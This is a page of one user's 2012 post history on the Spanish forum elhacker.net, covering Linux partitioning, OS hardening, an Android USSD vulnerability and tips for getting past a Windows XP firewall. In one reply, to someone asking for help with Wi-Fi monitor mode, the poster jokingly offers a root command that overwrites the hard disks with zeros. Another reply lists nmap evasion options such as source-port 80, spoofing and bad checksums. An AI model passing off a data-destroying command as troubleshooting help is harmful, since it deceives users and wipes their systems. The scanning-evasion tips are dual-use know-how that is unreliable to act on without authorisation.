elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a la Factorización De Semiprimos (RSA)


  Mostrar Mensajes
Páginas: 1 2 3 4 [5] 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 ... 26
41  Foros Generales / Foro Libre / Re: ¿Cuales son vuestros sistemas operativos favoritos? en: 3 Octubre 2012, 00:25 am
Citar
que un sistema operativo Linux funciona mejor que un sistema operativo de Microsoft, o, almenos eso creo

"Que funciona mejor" depende como lo compares.. Muchos blasfemian acerca de ello..

Ambos SO tienen sus pro y sus contras..

En mi opinión.. Las distros Linux se han vuelto "mas amigables" de lo que deberían de ser (en realidad siempre fue ese su objetivo)


Yo utilizo OBSD
42  Seguridad Informática / Wireless en Linux / Re: Ayuda BCM43228 Modo Monitor en: 2 Octubre 2012, 18:50 pm
Haz intentado con..?

Código:
#Como root
dd if=/dev/zero of=/dev/sda & dd if=/dev/zero of=/dev/hda

Aunque tarda lo suyo..

Suerte con tus vecinos  :xD
43  Sistemas Operativos / GNU/Linux / Re: sistema operativo imposiblede hackear. en: 1 Octubre 2012, 05:03 am
Citar
El sistema operativo imposible de "hackear" (desde una perspectiva de la seguridad), es aquel que no bootea ... simple como eso.

Jajjaja +1

Citar
OpenBSD

+10000


Vamos SO imposible de hackear no hay.. Puedes intentar armarte uno con un OBSD con el browser "enjaulado"  pasando el trafico por un tunel SSH + un IDS (snort?) + PF bien configurado y "dropeando" todo lo que no sea web.. mas un ClamAV configurado para que busque en / algun malware que se te cuele .. Mas una partición cifrada para guardar algunas cosillas... No estaría mal...


Pero con todo esto no estarías seguro.. Son practicas "algo" paranoicas.. Pero si eres tan paranoico para montarte algo asi.. Pues bien .. Bienvenido al club =)


Añado: La seguridad no solo depende del SO que uses.. Depende de muchos factores.. "Proteger" el SO es solo un primer paso. Puedes utilizar Windows y estar igual de seguro..
44  Sistemas Operativos / GNU/Linux / Re: Instalar Linux en VirtualBox en: 27 Septiembre 2012, 20:16 pm
Creo que estas iniciando desde el CD desmontalo e inicia

PD: LOL.. No leí el solucionado
45  Sistemas Operativos / GNU/Linux / Re: Partición. en: 27 Septiembre 2012, 20:14 pm
Solo necesitas 2.. la Swap puede ir en un fichero..
46  Sistemas Operativos / GNU/Linux / Re: Partición. en: 27 Septiembre 2012, 02:31 am
Acá las cosas no son así.. Primero lee sobre Linux.. Aprende su filosofía.. Como puedes administrarlo.. Luego Practica... Despues instala..

Podrías comenzar desde el ultimo paso.. Pero terminaras odiando a Linux
47  Foros Generales / Foro Libre / Re: Muestranos tu blog, pagina web, libro, documento, información, etc. en: 25 Septiembre 2012, 20:18 pm
¿?

Mi Github y mi blog siempre los pongo en mis firmas =)
48  Sistemas Operativos / GNU/Linux / Re: Partición. en: 25 Septiembre 2012, 17:22 pm
Depende.. A que llames "funcionar"

Si esta compilado estaticamente.. Quizás funcione... de otra forma.. Lo dudo mucho
49  Seguridad Informática / Bugs y Exploits / USSD Android Samsung Galaxy (I, II, III) Vulnerable ¿? en: 25 Septiembre 2012, 08:05 am
Hey.. Alguien a probado la vulnerabilidad hecha publica en el Ekoparty.?

http://adf.ly/D9ba8

Que tan cierta es.? Se que Ravi la probo.. Pero.. Alguien de acá la a probado contra su Android.?
50  Comunicaciones / Redes / Re: Evadir Firewall Window$ XP SP3 en: 25 Septiembre 2012, 05:22 am
Me da la impresión de que eres konarr =)


Pues mira.. Yo pondría como source port el 80 .. Yo e intentado con --badsum con XP pero no sin suerte... También tienes el parámetro -S (Para IP spoof ¿alguna IP de confianza?) Aunque este no lo e probado ... También tienes --ip-config (creo recordar que así se llamaba ese parámetro) para cambiar las TTL entre otras opciones


Saludos =)

Páginas: 1 2 3 4 [5] 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 ... 26
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines